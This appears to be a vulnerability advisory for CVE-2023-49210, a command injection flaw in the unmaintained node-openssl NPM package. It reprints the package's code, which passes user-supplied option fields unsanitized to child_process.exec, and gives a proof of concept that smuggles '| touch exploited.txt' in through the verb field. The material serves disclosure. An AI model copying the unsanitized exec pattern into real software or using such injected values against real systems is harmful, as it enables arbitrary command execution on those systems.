Headline
CVE-2023-49210: Package openssl: Function exec is called (#41) and a single argument ("command") is passed to the function, enabling the injection of commands. The package's exported openssl() function (see index.js
The openssl (aka node-openssl) NPM package through 2.0.0 was characterized as “a nonsense wrapper with no real purpose” by its author, and accepts an opts argument that contains a verb field (used for command execution). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Package openssl: Function exec is called (#41) and a single argument (“command”) is passed to the function, enabling the injection of commands. The package’s exported openssl() function (see index.js in this gist) takes an ‘opts’ argument which has ‘verb’ field which can be the injection command, such as "| touch exploited.txt".
/*
* “index.js” is the package’s file.
*/
'use strict’;
const util = require(‘util’);
const fs = require(‘fs’);
const { exec } = require(‘child_process’);
const debug = util.debuglog(‘node-openssl’);
function openssl() {
const opts = arguments[0]; console.log(opts);
var { verb, flags, tail } = opts; console.log(flags);
debug(`> openssl`);
debug(`Found ${Object.keys(opts).length} properties.`);
return new Promise(function execPromiseHandler(resolve, reject) {
if (typeof flags !== ‘string’ || Array.isArray(flags)) {
reject(
new Error(
`’flags’ option must be an array or string of openssl ${verb} command flags.`,
),
);
}
if (Array.isArray(flags)) {
flags = flags.join(' ');
}
if (
typeof tail !== ‘undefined’ &&
typeof tail !== ‘string’ &&
typeof tail !== ‘number’
) {
reject(new Error(`’tail’ option must be a string or number argument.`));
if (typeof tail === ‘number’) {
tail = tail.toString();
}
}
var stdout = '’;
var stderr = '’;
const command = `openssl ${verb} ${flags} ${tail}`;
debug(`Executing: ${command}`);
const cp = exec(command); console.log(command);
cp.stdout.on('data’, (data) => {
stdout += data;
});
cp.stderr.on('data’, (data) => {
stderr += data;
});
cp.on('close’, (code) => {
debug(`< openssl`);
resolve({ cwd: process.cwd(), stdout, stderr });
});
cp.on('error’, (err) => {
reject(err);
});
});
}
module.exports = openssl;
/*
* “openssl-2.0.0_poc.js” is the proof-of-concept.
*/
const openssl = require(‘openssl’);
const opts = {
verb: "| touch exploited.txt",
flags: "",
tail: “”
};
/*
* This will create a local ‘exploited.txt’ file.
*/
const r = openssl(opts);
Related news
The openssl (aka node-openssl) NPM package through 2.0.0 was characterized as "a nonsense wrapper with no real purpose" by its author, and accepts an opts argument that contains a verb field (used for command execution). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.